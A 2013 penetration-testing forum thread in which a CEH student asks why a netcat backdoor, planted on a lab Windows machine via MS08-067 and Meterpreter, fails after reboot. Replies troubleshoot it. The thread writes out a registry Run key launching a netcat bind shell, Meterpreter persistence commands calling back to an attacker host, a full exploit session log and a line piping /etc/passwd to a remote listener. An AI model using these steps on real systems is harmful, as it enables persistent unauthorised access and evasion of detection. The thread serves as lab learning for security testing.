.

netcat question

<<

Dalobo

Newbie
Newbie

Posts: 27

Joined: Wed Jan 23, 2013 7:49 pm

Post Sun Jan 27, 2013 8:45 pm

netcat question

I spent the last few hours in the lab figuring out how to upload, autorun, and clean up all evidence that I had ever had a backdoor on a Windows box.

But I ran across a few things I could not figure out.

Steps:
Got a meterpreter shell on the victim
Uploaded nc.exe to the system32 folder
Set the regkey for running nc in listening mode at startup
Logged in as the admin on the victim machine
Rebooted the victims server using meterpreter reboot cmd
Waited for windows to reboot
Logged in as admin on the victim server
Connected from BT using nc IP port command

Questions:

1. When in meterpreter, why can I only reboot the remote victims machine when someone is logged in on that machine?
2. Why can I only connect to netcat on the victims machine when someone is logged in on that machine?

What am I doing wrong? Doing it this way just makes me more likely to get caught.

Thank you,

Dalobo
<<

Dark_Knight

User avatar

Sr. Member
Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Sun Jan 27, 2013 9:52 pm

Re: netcat question

Having established a meterpreter session, do you migrate to another process?
Last edited by Dark_Knight on Sun Jan 27, 2013 9:56 pm, edited 1 time in total.
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

Dalobo

Newbie
Newbie

Posts: 27

Joined: Wed Jan 23, 2013 7:49 pm

Post Mon Jan 28, 2013 5:53 pm

Re: netcat question

No, I did not.  I used the MS08-67 to own the box.  When I typed shell, and then whoami - I think I  got administrator. That would make sense. I was not NT Authority.

I will have to try this again, but see about getting NT Authority. I will let you know once I have time to work on it again

Thank you Dark_Knight.

Dalobo
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Mon Jan 28, 2013 6:41 pm

Re: netcat question

You should be SYSTEM with MS08-067, not administrator.

It would help if you post the exact registry key you added and the shutdown/restart command you're trying to use.
The day you stop learning is the day you start becoming obsolete.
<<

Dalobo

Newbie
Newbie

Posts: 27

Joined: Wed Jan 23, 2013 7:49 pm

Post Mon Jan 28, 2013 7:58 pm

Re: netcat question

OK.  I redid this and I am nt authority, and the reboot command worked without having me log into the victim as admin.

I am still unable to connect using netcat.

I set the following key using this command

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\currentversion\\RUN -v BackDoor -d c:\\windows\\system32\\nc.exe" -L -d -p 1234 -e cmd.exe"

meterpreter > reboot

Once rebooted, I open a terminal and type:
nc 192.168.5.150 1234

I get connection refused.

I will do some more testing and get back to you.

Thank you,

Dalobo
<<

superkojiman

User avatar

Jr. Member
Jr. Member

Posts: 81

Joined: Thu Sep 20, 2012 9:42 pm

Post Mon Jan 28, 2013 11:01 pm

Re: netcat question

Is the Windows firewall turned on? Can you check if netcat running and listening on the port you specified after you rebooted?
OSCP + OSCE
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Mon Jan 28, 2013 11:24 pm

Re: netcat question

I believe all the "run" registry keys require a user to log in. The "run" under HKLM applies to all users, and the "run" under HKU will only apply to that specific user.

If you haven't played around with it yet, do a run persistence -h inside of a meterpreter session. The -S option will allow you to install a service that should run upon startup.
The day you stop learning is the day you start becoming obsolete.
<<

Dalobo

Newbie
Newbie

Posts: 27

Joined: Wed Jan 23, 2013 7:49 pm

Post Sat Feb 02, 2013 8:47 pm

Re: netcat question

I still can't get netcat to connect without a user being logged in.

I did give the persistence a try and can now have meterprrter call home whenever I lose the sessions.  :)

I used
  Code:
run persistence -S -A -X -i 10 -p 445 -r 192.168.1.10


I am still lost on how an admin would use netcat to control a server. If he has to log into Windows to  be able to make a connection to netcat... then he can control it that way... what is the point of netcat at that time?

Thank you,

Dalobo
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Sat Feb 02, 2013 9:12 pm

Re: netcat question

Maybe you can create a netcat service similar to what run persistence does using sc: http://technet.microsoft.com/en-us/libr ... 89(v=ws.10).aspx

There really isn't a practical reason for an admin to use netcat to legitimately administer a server. Remote desktop, psexec, PowerShell, etc. would be used in practice.
The day you stop learning is the day you start becoming obsolete.
<<

Dalobo

Newbie
Newbie

Posts: 27

Joined: Wed Jan 23, 2013 7:49 pm

Post Sun Feb 03, 2013 8:26 am

Re: netcat question

Thanks.  I thought netcat was a way for admins to administer their boxes, without using RDP.  While I understand that is kind of silly for them to do, I just thought that was the "legitimate" purpose of netcat. To be honest, as a pentester, I think I would rather have a meterpreter connection then a netcat connection.

I did have issues where the persistence shell did not call home after a few exits. I will have to play around with it some more.

Will persistence still make a connection back to you when you reboot your attacking box? I would think so, but was unable to get it to work for me.

I am doing all of this testing/learning for my CEH.

Thanks again for all the help,

Dalobo
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Sun Feb 03, 2013 1:47 pm

Re: netcat question

I'm sure there's been an admin or two that have tried, but it's really not a good solution. Hopefully they'd at least use socat or cryptcat and have it connect back to their system, not just bind so anyone on the network could access it ;)

There are a lot of legitimate uses for netcat. It's great to do basic network tests (i.e. did the firewall change get implemented correctly?):

  Code:
# nc -vv google.com 80

Connection to google.com 80 port [tcp/http] succeeded!


I also use it for copying information over the network where I don't want to setup something like file sharing.
destination: # nc -lp 9999 > goodies.txt
source: # cat /etc/passwd | nc 192.168.1.99 9999

Be sure to familiarize yourself with the netcat cheat sheet: http://www.sans.org/security-resources/ ... eet_v1.pdf The port relaying stuff is pretty cool too.

And yes, Meterpreter is preferred to netcat from a pen testing perspective, but it's not always feasible or possible. It's important to know how to get around with a basic shell on both *nix and Windows systems.

I'm not sure why you're not receiving a connection upon a reboot. It works for me:

  Code:
msf > use exploit/windows/smb/ms08_067_netapi
rhost => 192.168.1.50
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.99:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.99:4444 -> 192.168.1.50:1031) at Sun Feb 03 10:49:22 -0700 2013

meterpreter > run persistence -A -S -X -i 5 -p 443 -r 192.168.1.99
[*] Creating a persistent agent: LHOST=192.168.1.99 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 609700 bytes long
[*] Uploaded the persistent agent to C:\WINDOWS\TEMP\efdfhUSKx.vbs
[*] Agent executed with PID 1200
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YkPXtjqzB
[*] Creating service LendDpizgQ
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/XXXXXX-AEF856CC_20130203.5054/clean_up__20130203.5054.rc
meterpreter > [*] Meterpreter session 2 opened (192.168.1.99:443 -> 192.168.1.50:1034) at Sun Feb 03 10:51:03 -0700 2013

Background session 1? [y/N]
msf exploit(ms08_067_netapi) > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC  192.168.1.99:4444 -> 192.168.1.50:1031
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XXXXXX-AEF856CC  192.168.1.99:443 -> 192.168.1.50:1034

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > reboot
Rebooting...
meterpreter > exit

[*] Meterpreter session 2 closed.  Reason: User exit
msf exploit(ms08_067_netapi) > [*] Meterpreter session 3 opened (192.168.1.99:443 -> 192.168.1.50:1035) at Sun Feb 03 10:52:04 -0700 2013

msf exploit(ms08_067_netapi) > sessions -K
[*] Killing all sessions...
[*] Meterpreter session 1 closed.
[*] Meterpreter session 3 closed.

msf exploit(ms08_067_netapi) > jobs

Jobs
====

  Id  Name
  --  ----
  0   Exploit: multi/handler

msf exploit(ms08_067_netapi) > [*] Meterpreter session 4 opened (192.168.1.99:443 -> 192.168.1.50:1025) at Sun Feb 03 10:52:44 -0700 2013


Make sure you have your listener (multi/handler) setup and waiting for the connection. run persistence will do this for you with -A, but you'll have to configure it manually if you don't use that. Check the output of netstat -anp tcp on your Windows host to start troubleshooting.

Way to actually get your hands dirty and not just memorize trivia for your CEH :)
The day you stop learning is the day you start becoming obsolete.
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Mon Feb 04, 2013 8:11 am

Re: netcat question

ajohnson wrote:Way to actually get your hands dirty and not just memorize trivia for your CEH :)


^^ +1
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH

Return to Network Pen Testing

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software